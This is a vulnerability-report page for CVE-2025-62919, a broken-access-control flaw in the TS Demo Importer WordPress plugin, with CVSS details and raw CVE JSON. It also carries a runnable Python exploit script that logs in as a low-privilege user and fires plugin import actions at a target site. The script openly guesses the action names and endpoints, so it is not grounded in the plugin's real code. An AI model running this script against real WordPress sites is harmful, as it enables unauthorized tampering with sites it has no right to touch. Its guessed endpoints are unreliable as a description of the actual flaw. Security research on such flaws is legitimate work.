Security Vulnerability Report
中文
CVE-2025-62919 CVSS 5.4 MEDIUM

CVE-2025-62919

Published: 2025-10-27 02:15:51
Last Modified: 2026-04-27 18:16:31

Description

Missing Authorization vulnerability in themeshopy TS Demo Importer ts-demo-importer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TS Demo Importer: from n/a through <= 0.1.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

TS Demo Importer <= 0.1.3(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62919 PoC - TS Demo Importer Authorization Bypass # Author: Security Researcher # Target: WordPress with TS Demo Importer <= 0.1.3 import requests import sys from urllib.parse import urljoin def exploit_cve_2025_62919(target_url, username, password): """ Exploit Missing Authorization in TS Demo Importer plugin This PoC demonstrates how a low-privilege user can trigger import functions without proper capability checks. """ session = requests.Session() # Step 1: Login as low-privilege user (subscriber role) login_url = urljoin(target_url, 'wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Logging in as {username}...') login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Login failed!') return False print('[+] Login successful!') # Step 2: Identify the vulnerable AJAX endpoint # Common patterns for TS Demo Importer ajax_endpoints = [ 'wp-admin/admin-ajax.php', 'wp-json/ts-demo-importer/v1/import' ] # Step 3: Trigger import action (bypassing authorization) for endpoint in ajax_endpoints: ajax_url = urljoin(target_url, endpoint) # Common import action names for demo importer plugins import_actions = [ 'ts_demo_importer_import', 'tsdi_import_demo', 'ts_demo_import_data' ] for action in import_actions: print(f'[*] Trying action: {action} on {endpoint}') post_data = { 'action': action, 'demo_id': 'malicious_demo', 'nonce': '' # May not be required due to missing check } try: response = session.post(ajax_url, data=post_data, timeout=10) # Check for successful exploitation indicators if response.status_code == 200: if 'success' in response.text.lower() or 'imported' in response.text.lower(): print(f'[!!!] VULNERABLE! Action {action} executed successfully!') print(f'[+] Response: {response.text[:200]}') return True except requests.exceptions.RequestException: continue print('[-] Exploitation attempt completed. Check manually if vulnerable.') return False if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python cve_2025_62919_poc.py <target_url> <username> <password>') print('Example: python cve_2025_62919_poc.py http://example.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_62919(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62919", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:51.450", "lastModified": "2026-04-27T18:16:30.860", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themeshopy TS Demo Importer ts-demo-importer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TS Demo Importer: from n/a through <= 0.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ts-demo-importer/vulnerability/wordpress-ts-demo-importer-plugin-0-1-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}